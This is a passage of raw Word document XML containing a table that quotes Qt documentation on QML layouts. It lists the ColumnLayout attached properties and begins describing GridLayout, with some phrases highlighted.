                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>convenience for developers</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, as it offers a </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>cleaner API</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00A40BC4" w:rsidP="00763692">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="720"/>
              </w:tabs>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Items in a </w:t>
            </w:r>
            <w:hyperlink r:id="rId1735" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColumnLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>support these attached properties</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:hyperlink r:id="rId1736" w:anchor="minimumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.minimumWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1737" w:anchor="minimumHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.minimumHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1738" w:anchor="preferredWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.preferredWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1739" w:anchor="preferredHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.preferredHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1740" w:anchor="maximumWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.maximumWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1741" w:anchor="maximumHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.maximumHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1742" w:anchor="fillWidth-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.fillWidth</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1743" w:anchor="fillHeight-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.fillHeight</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1744" w:anchor="alignment-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.alignment</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1745" w:anchor="margins-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.margins</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1746" w:anchor="topMargin-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.leftMargin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1747" w:anchor="rightMargin-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.rightMargin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1748" w:anchor="topMargin-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.topMargin</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:hyperlink r:id="rId1749" w:anchor="bottomMargin-attached-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>Layout.bottomMargin</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A40BC4" w:rsidRPr="002230B8" w:rsidTr="00763692">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1702" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00CB1AAD" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GridLayout</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2235" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00490E7E" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId1750" w:history="1">
              <w:r w:rsidR="00CB1AAD" w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>http://doc.qt.io/qt-5/qml-qtquick-layouts-gridlayout.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00CB1AAD" w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="be-BY"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7546" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="00BC1D31" w:rsidRPr="00763692" w:rsidRDefault="00BC1D31" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Detailed Description</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC1D31" w:rsidRPr="00763692" w:rsidRDefault="00BC1D31" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1751" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GridLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> is </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>resized, all items in the layout will be rearranged</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. It is similar to the widget-based </w:t>
            </w:r>
            <w:hyperlink r:id="rId1752" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>QGridLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>. All visible children of the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1753" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>GridLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> element will belong to the layout. </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> you want a layout with just one row or one column, </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>you can use the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1754" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>RowLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t> or </w:t>
            </w:r>
            <w:hyperlink r:id="rId1755" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>ColumnLayout</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>These offer a bit more convenient API, and improve readability</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00BC1D31" w:rsidRPr="00763692" w:rsidRDefault="00BC1D31" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">By default items will be arranged according to the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1756" w:anchor="flow" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>flow</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> property</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">. The </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">default value of the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1757" w:anchor="flow" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>flow</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> property is </w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:highlight w:val="yellow"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>GridLayout.LeftToRight</w:t>
            </w:r>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00A40BC4" w:rsidRPr="00763692" w:rsidRDefault="00BC1D31" w:rsidP="00763692">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>If the </w:t>
            </w:r>
            <w:hyperlink r:id="rId1758" w:anchor="columns-prop" w:history="1">
              <w:r w:rsidRPr="00763692">
                <w:rPr>
                  <w:rStyle w:val="a3"/>
                  <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                  <w:i/>
                  <w:sz w:val="24"/>
                  <w:szCs w:val="24"/>
                  <w:highlight w:val="yellow"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <w:t>columns</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00763692">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
                <w:i/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
